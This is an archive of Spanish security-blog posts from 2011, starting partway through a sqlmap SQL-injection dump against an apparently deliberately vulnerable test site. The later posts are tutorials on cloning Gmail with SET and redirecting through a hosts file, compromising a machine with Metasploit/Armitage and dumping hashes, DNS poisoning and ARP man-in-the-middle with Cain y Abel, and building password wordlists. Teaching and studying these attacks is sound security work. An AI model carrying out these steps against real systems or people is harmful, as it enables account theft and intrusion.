+--------------+--------+
+--------------+--------+

[16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output
/test.acunetix.com/dump/acuart/featured.csv'
[16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
artist_id, int(5), aname, varchar(50), adesc, text
[16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart'
Database: acuart
Table: artists
[3 entries]
+--------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
-+---------+-----------+
| adesc | aname | artist_id |
+---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------
---------------+---------+-----------+
| \nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\
nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean
 viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam
 lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n
\n\nLorem ipsum dolor sit amet, 
consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum 
condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis.
 Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio.
 Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent 
per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor
.\n
 | lyzae | 3 |
| \nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. 
Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\n 
Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra.
 Class aptent taciti sociosqu ad\n litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n 
Mauris magna eros, semper a, tempor et, rutrum et, tortor.\n
\n\nLorem ipsum dolor sit amet, consectetuer
 adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum 
facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenatis. Aliquam 
posuere lobortis pede. Nullam fringilla urna id leo.\n Praesent aliquet pretium erat. Praesent non odio. 
Pellentesque a magna a\n mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\n litora 
torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\n Mauris magna eros, semper a, tempor et, 
rutrum et, tortor.\n
 | r4w8173 | 1 |
| \nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\nPraesent aliquet
 pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean viverra. Class aptent 
taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus.\nMauris magna eros,
 semper a, tempor et, rutrum et, tortor.\n
\n\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec
 molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse
 platea dictumst. Nulla nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam
 fringilla urna id leo.\nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris 
vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per 
inceptos hymenaeos. Aliquam lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n
 | Blad3 | 2 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+-----------+

[16:57:49] [INFO] Table 'acuart.artists' dumped to CSV file '/pentest/database/sqlmap/output/
test.acunetix.com/dump/acuart/artists.csv'
[16:57:49] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id,
 int(5), pshort, mediumtext, plong, text, price, int(11), cat_id, int(11), a_id, int(11), title, varchar(100), 
img, varchar(50)
[16:57:49] [INFO] fetching entries for table 'pictures' on database 'acuart'
Database: acuart
Table: pictures
[7 entries]
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+
| a_id | cat_id | img | pic_id | plong | price | pshort | title |
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+
| 2 | 1 | ./pictures/7.jpg | 7 | bla bla bla long | 15000 | bla bla bla | Trees |
| 1 | 2 | ./pictures/6.jpg | 6 | \nThis picture is an 99 cm x 200 cm masterpiece.\
n
\n\nThis text is not meant to be read. This is being used as a place holder. 
Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information.
This text is not meant to be read. This is being used as a place holder. Please feel free to change this
 by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information. \n | 10000 | Lorem ipsum dolor sit
 amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin.\n | Thing |
| 1 | 1 | ./pictures/5.jpg | 5 | \nThis picture is an 53 cm x 12 cm masterpiece.\n
\n\nThis text 
is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting
 your own information.This text is not meant to be read. This is being used as a place holder. Please feel free 
to change this by inserting your own information.This text is not meant to be read. This is being used as a place 
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This 
is being used as a place holder. Please feel free to change this by inserting your own information. \n | 460 
| Lorem ipsum dolor sit amet, consectetuer adipiscing elit. | Mean |
| 1 | 1 | ./pictures/2.jpg | 2 | \nThis picture is an 53 cm x 12 cm masterpiece.\n
\n\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
 own information.This text is not meant to be read. This is being used as a place holder. Please feel free to 
change this by inserting your own information.This text is not meant to be read. This is being used as a place 
holder. Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information. \n 
| 800 | Donec molestie.\nSed aliquam sem ut arcu. | Mistery |
| 1 | 1 | ./pictures/1.jpg | 1 | \nThis picture is an 53 cm x 12 cm masterpiece.\n
\n\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your 
own information.This text is not meant to be read. This is being used as a place holder. Please feel free to 
change this by inserting your own information.This text is not meant to be read. This is being used as a place
 holder. Please feel free to change this by inserting your own information.This text is not meant to be read. 
This is being used as a place holder. Please feel free to change this by inserting your own information. \n 
| 500 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. |
 The shore |
| 1 | 1 | ./pictures/4.jpg | 4 | \nThis picture is an 53 cm x 12 cm masterpiece.\n
\n\nThis text is not
 meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own 
information.This text is not meant to be read. This is being used as a place holder. Please feel free to change
 this by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information.This text is not meant to be read. This is being
 used as a place holder. Please feel free to change this by inserting your own information. \n | 1000 | Lorem 
ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin
.\n | Walking |
| 1 | 1 | ./pictures/3.jpg | 3 | \nThis picture is an 53 cm x 12 cm masterpiece.\n
\n\nThis text is not 
meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n
 | 986 | Lorem ipsum dolor sit amet. Donec molestie.\nSed aliquam sem ut arcu. | The universe |
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+

[16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.
com/dump/acuart/pictures.csv'
[16:57:49] [INFO] fetching columns for table 'users' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname, 
varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100)
, phone, varchar(100), cart, varchar(100)
[16:57:49] [INFO] fetching entries for table 'users' on database 'acuart'

[16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

^C
[17:01:59] [ERROR] user aborted

[*] shutting down at 17:01:59

Volvéis a tener en rojo la información extraída.

Hasta aquí un pequeño repaso de SQLMap

Un saludo

Filed under: Backtrack, Seguridad Tagged: Backtrack, bases de datos, hacking, SQLMap

SET social engineering toolkit

Marc Rivero López — Fri, 22 Jul 2011 14:50:40 +0000

Hola!

Muy buenas a todos/as!

El navegar de manera segura y, no introducir tus credenciales en redes públicas no es algo novedoso.

Hoy mostraré como es de sencillo el poder clonar una página web y capturar las credenciales de la víctima.

Para este ataque lo haremos en dos partes, la primera parte consistirá en conseguir acceso de administrador a la máquina de manera que podremos modificar l archivo hosts para redireccionar las peticiones.

Para conseguir acceso administrador usamos el exploit de Metasploit ms08_067_netapi

Como no es nuevo aqui adjunto una imagen de como se hace paso por paso

Ya tenemos acceso a la máquina remota como administrador, modificamos el archivo de hosts y le decimos que

192.168.37.132 gmail.com

Es decir que cuando la víctima acceda a gmail.com será redireccionado a nuestro PC para robarle las credenciales.

Una vez, este listo lo del archivo hosts ponemos a trabajar a SET

Tenemos diferentes ataques disponibles escogemos Website attack Vector

Ahora elegimos el ataque 3 Credential Harvester attack method

Set viene predefinido con templates para poder usar, así que nos basaremos en un template

Lo que haremos será clonar Gmail

Nos da una descripción del ataque

Nos avisa de que ha lanzado el servicio en el puerto 80

Cuando el cliente se conecte nos llegará un aviso

Para el usuario la web “parece normal”

Cuando el usuario introduzca las credenciales serán robadas

Ya tenemos los datos de la cuenta.

Asi que recuerda, navega solo por sitios seguros

Filed under: Backtrack, Seguridad Tagged: Backtrack, hacking, Seguridad, SET, social engineering toolkit

Armitage GUI front-end de Metasploit

Marc Rivero López — Fri, 24 Jun 2011 13:49:43 +0000

Hola!

Muy buenas a todos/as!

Quien se dedica a la seguridad conoce sin duda metasploit. Metasploit puede ser complicado de usar si no conocemos bien como funciona. Existen GUI gráficas como Armitage.

Armitage trabaja como front-end de Metasploit.

En Backtrack está en los repositorios así que lo instalamos con:

root@bt: apt-get install armitage

Con esto tendremos Armitage instalado en nuestro sistema.

Igual que hacíamos con autopown usando Fasttrack necesitamos usar MYSQL, así que iniciamos MYSQL:

root@bt: /etc/init.d/mysql start

Ahora nos conectaremos a la base de datos para poder usar Armitage, como lo haremos por defecto lo haremos así:

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic…
[*] XMLRPC ready at Thu Jun 23 20:28:49 +0200 2011.

Ahora arrancaremos Armitage:

root@bt:/pentest/exploits/armitage# ./armitage.sh

Si no hemos cambiado anda de la instalación de Backtrack por defecto, esto lo dejamos de esta manera.

Armitage nos avisa que usará el driver mysql.

Esta es la pantalla principal de Armitage, a la izquierda tenemos una lista de exploits de Metasploit, abajo tenemosla consola de Metasploit.

Ahora lo que haremos es encontrar los equipos para el lanzamiento de los exploits.

Con NAMP lo que haremos es lo que hacemos normalmente, que es buscar puertos abiertos, versión del sistema operativo etc..

Introducimos el rango de IP’s que queremos escanear o bien la dirección IP del host directamente si la conocemos.

Como ya tenemos el scan echo podemos encontrar ataques con las vulnerabilidades que encontremos.

Podemos ver que se ha indetificado como un equipo Windows XP

Si clicamos en encima del Host podemos ver Services y Host, si le damos a services podemos ver lo servicios que ha identificado

Ya tenemos los servicios

Ahora podemos buscar exploits de Metasploit basandose en los puertos y servicios que ha encontrado.

Ahora ya ha encontrado los ataques que podemos hacerle.

Tenemos un menú para poder lanzar el ataque que queramos.

Podemos especificar opciones avanzadas en el ataque.

Cuando la máquina es comprometida sale así

Ya está el equipo comprometido.

En la consola de Metasploit podemos ver que ha conseguido una sesion de Meterpreter

De manera gráfica también tenemos las opciones disponibles con Meterpreter

Podemos navegar de manera perfecta por todo el sistema operativo

Y podemos sacar los Hashes de los usuarios

Y podemos obtener una consola CMD de Windows.

Y hasta aquí una sesión de Meterpreter.

Filed under: Linux, Seguridad, Servicios, Sistemas Operativos, Software Tagged: Armitage, Backtrack, hacking, metasploit, Meterpreter, Seguridad

DNS poisoning con Cain y Abel

Marc Rivero López — Tue, 07 Jun 2011 20:40:48 +0000

Hola!

Muy buenas a todos/as!

Ayer podíamos ver como hacíamos un ataque man in the middle con Cain y Abel, hoy lo que haremos será envenenar la cache DNS, así que las consultas que haga la víctima, por ejemplo a http://dragonjar.org haremos que sea redirigido a http://seifreed.com.

Con esto conseguimos por ejemplo suplantar una página sin que el usuario se de cuenta, o por ejemplo redirigir hacía una página de exploits.

Ya tenemos el man in the middle corriendo, ahora nos vamos a APR – DNS

Añadimos la URL que queremos suplantar

Hemos añadido que cada vez que el usuario vaya a http://dragonjar.org, resolveremos por el host que queramos,

Después de poner el dominio que nos interesaba, lo resolvemos para sacar la IP.

Podemos ver todo el tráfico que se va generando.

Los ataques de DNS poisoning, son muy peligrosos.

Un saludo

Filed under: DNS, Seguridad, Software Tagged: cain y abel, DNS poisoning, hacking, Seguridad

Man in the middle con Cain y Abel

Marc Rivero López — Mon, 06 Jun 2011 23:09:25 +0000

Hola!

Muy buenas a todos/as!

El ataque del “hombre en el medio” es algo, que no es nuevo ni mucho menos.

He creado un escenario súper sencillo en una red local.

El escenario es el siguiente.

Tenemos el pc de usuario en una parte de la red LOCAL y luego el atacante, con el símbolo del DragoN.

El atcante tiene Windows 7 y el usuario Windows XP.

Lo que haremos primero será poner la tarjeta en modo promiscuo, de manera que pondremos la tarjeta a escuchar todos los paquetes en la red.

Aquí tenemos el rango de la red LOCAL en el cual, nos mantendremos a la escucha.

Ahora detectaremos los equipos en la red, para poder hacer el ataque

Activamos el snifer y el ARP en Cain y Abel

En la pestaña de Snifer y en Hosts, escaneamos por MAC ADRESS.

Seleccionamos hacer todos los test para que empiece a descubrir todos los equipos de la red.

Podemos ver los equipos que va encontrando

Ahora que ya sabemos las IP de la red local, le damos a la tecla +

Aquí tenemos las diferentes IP’s, seleccionamos la Ip de la puerta de enlace.

Seleccionamos todos los host para hacer el man in the middle, y hacer poisoning

El ataque man in the middle ya ha empezado.

El ataque poisoning, ya está haciendo efecto, hasta que veremos lo siguiente

Podemos ver abajo el aviso de Full-routing, significa que el ataque man in the middle ha tenido éxito.

Y cuando el usuario acceda con algunas credenciales, como HTTP, FTP, SMB, quedarán registradas en Cain y Abel

Y hasta aquí un proceso de ataque de Man in the middle con Cain y Abel

Un saludo

Filed under: Conferencia, Networking, Personal, Seguridad, Software Tagged: cain y abel, hacking, man in the middle, Seguridad

RSMangler, wordlist generator

Marc Rivero López — Sun, 17 Apr 2011 11:30:51 +0000

Hola!

Muy buenas a todos/as!

Existen diferentes tipos de diccionarios que podemos bajar para poder crear nuestros diccionarios para utilizar en nuestras auditorias.

Hay una utilidad muy buena llamada RSmangler, esta utilidad nos permite, a través de una palabra o una lista de palabra en un fichero poder crear diferentes combinaciones.

A diferencia de otros generadores de diccionarios, con este todas las opciones vienen por defecto activadas. Si queremos excluir una de las combinaciones de palabras que se quieran hacer solo debemos de ponerla en la linea de comandos.

Para descargar RSMangler lo hacemos desde aquí

Hagamos un ejemplo de RSMangler, creamos un fichero y lo guardamos con la palabra seifreed, por ejemplo.

Y ahora pasamos RSMangler

root@dragon-backtrack:~/rsmangler# ./rsmangler.rb –file fichero.txt >> fichero_modificado.txt

Ahora el fichero que hemos exportado con las modificiones queda de la siguiente manera

Ver en Pastebin

Así que no hay excusa para tener nuestros diccionarios con nuestras palabras.

Un saludo

Filed under: Seguridad, Software Tagged: hacking, RSMangler, Seguridad, wordlist